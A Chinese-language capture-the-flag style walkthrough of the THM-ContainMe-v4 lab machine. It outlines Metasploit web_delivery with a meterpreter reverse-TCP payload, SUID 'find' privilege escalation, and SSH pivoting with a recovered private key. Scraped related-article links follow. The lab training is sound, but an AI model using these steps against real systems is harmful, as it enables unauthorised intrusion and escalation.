对vulhub靶机THM-ContainMe-v4的渗透测试过程
靶机信息:
kali:192.168.21.129
靶机:192.168.21.151
下载地址:ContCont
信息收集
端口扫描:开放了22,80,2222,8022端口
nmap -A -p- 192.168.21.151
访问一下web端 Apache默认界面,没有什么信息
扫描一下目录,info.php文件
dirb http://192.168.21.151
看一下info.php页面,发现了这个
其余的好像没有什么特别重要的信息
再看看index.php页面
里面可能有还有其他路径,对这个页面模糊测试一下
wfuzz -c -w /usr/share/dirb/wordlists/common.txt -u http://192.168.21.151/index.php
z
找到了 加到路径后面去看能不能查看些其他东西
发现他好像只能查看有没有这个东西,不能查看文件里面的内容
测试一下看能不能执行一些命令还是其他的
接着上msf
use exploit/multi/script/web_delivery #使用这个攻击模块
set payload php/meterpreter/reverse_tcp #设置payload
set target php #设置目标
show options #查看选项
运行
把生成payload放到页面执行
msf就会产生一个会话
利用Python重新开启一个终端
python3 -c 'import pty;pty.spawn("/bin/bash")'
进入到home目录下看下,有个mike目录,进去看下有什么东西
ls -al 查看所有文件以及所有的详细信息
这里发现最后文件具有可执行权限,试着执行一下看是什么东西
执行,这是个啥
因为现在为www-data用户,权限非常低,利用一下find提权吧,可以暂时提权root权限
不懂的话可以看看其他文章
find / -perm -4000 2>/dev/null
注意这个
进入到这个目录然后执行相应的文件,这个时候发现我们已经是root权限了,但是我们发现好像Id依然显示的是www-data用户
总感觉没有哪里怪怪的,好像没有跳出容器,继续吧,看一下网络接口
想办法整个nmap过来,扫描一下接口还有没有其他主机;扫描之后发现还有个主机172.16.20.6
且该主机的22端口开放
别忘了我们刚才在用户目录下发现了.ssh的备份文件
看下里面有什么
ssh mike@172.16.20.6 -i id_rsa #-i 指定连接文件
查看开放的端口,3306 MySQL端口,里面肯定有东西,连接
ss -tlnu
退出,切换root用户
进入到root目录下发现有个压缩文件
利用unzip解压,需要密码。密码已经在数据库里头了,解压完成后发现flag在里头
对vulhub靶机THM-ContainMe-v4的渗透测试过程相关推荐
- 渗透测试php过程,利用骑士cms的一次纠结的渗透测试过程(两个潜在
今天下载了骑士cms的最新版本,由于好久以前一个哥们发了一个后台拿shell的漏洞,还有别人发的一个sql注入的漏洞,一个有意思的渗透测试过程就从这两个地方开始了,成功的拿下了某大型人才网站的服务器, ...
- vulhub靶机joker渗透
先设置为NAT模式 主机发现 Masscan快速扫描端口 服务扫描 访问8080端口,需要用户名和密码来登录 抓包,发现是base64加密,类似于tomcat的用户名和密码格式 放到intruder模 ...
- 攻击CSK靶机环境并学习linux渗透思路
CATALOG 前言 环境配置 第一步:配置vmware的vmnet8的dhcp 第二步:下载csk靶机 第三步:打开靶机 开始攻击 第一步:扫描 第二步:利用漏洞获得shell 第三步:提权 提权操 ...
- centos7搭建vulhub靶机教程
一.搭建靶场 1.安装docker yum -y install docker 出现完毕(complete)则表示安装完成 2.启动docker服务 systemctl start docker 报错 ...
- OSCP练习:vulhub靶机TR0LL 1攻略
信息收集 主机发现 nmap -sC -sV 192.168.8.132 发现21.22.80端口 网站信息收集 访问80端口,没啥有用信息 访问ftp 使用 Anonymous 匿名用户登录,密码为 ...
- OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...
- INE Penetration Testing Basics 黑盒渗透测试过程
简介 官方网站: https://my.ine.com/CyberSecurity/courses/6f986ca5/penetration-testing-basics 黑盒渗透测试1 启动实验室, ...
- 渗透测试的8个步骤 展现一次完整的渗透测试过程及思路
渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 .之前安全加介绍了金融行业 实战微信银行渗透测试, 运营商 渗透测试实战 ,今天让我们来说说 渗透测试 的流程及渗透测试相关 ...
- HA: Forensics靶机渗透测试
文章目录 靶机说明: 一.信息收集 1.主机发现 2.端口扫描 二.漏洞挖掘 1.访问靶机 web 服务 2.使用 dirb 进行目录扫描 3.使用 exiftool 提取数据 4.使用 dirb 扫 ...
- [HTB]“Heist”靶机渗透详细思路
今天我们来看一下hackthebox里的一个靶机"Heist",直接开始渗透. 一.信息搜集 先打开网站看看.是一个登陆框,使用弱口令和注入都无果.在网页中发现了 login as ...
最新文章
- OpenCV支持的图像格式
- 【数字信号处理】序列表示与运算 ( 序列乘以常数 | 序列相加 | 序列移位 | 序列尺度变换 )
- matlab第二次上机作业答案,第二次上机作业
- 用Spring长轮询Tomcat
- 今天来聊聊 Redis 的主从复制
- 取 java 程序运行的路径_获取Java程序运行的路径 | 获取当前jar包的路径
- 用C#来播放.wav格式的音频文件
- gis python趋势变化代码_GIS技术发展趋势——2018年回顾与2019年展望
- 欠薪的公司,不要做任何犹豫!
- USACO1.3.4 Combination Lock
- 配置Gitlab Push自动触发jenkins构建
- 图像坐标系、相机坐标系和世界坐标系 相机的内、外参数矩阵
- 微星显卡拷机测试软件,显卡稳定性测试必备 微星Kombustor工具
- mysql 日历表_mysql创建日历表
- 方舟怎么看服务器信息,方舟怎么看服务器ip地址
- java pdf替换内容_java PDF批量替换关键词
- 高德地图 去掉左下角logo
- 彻底关闭Chrome浏览器更新及右上角的更新提示
- 数学建模常见算法:拟合算法
- 交互设计:界面设计尺寸详解与常用尺寸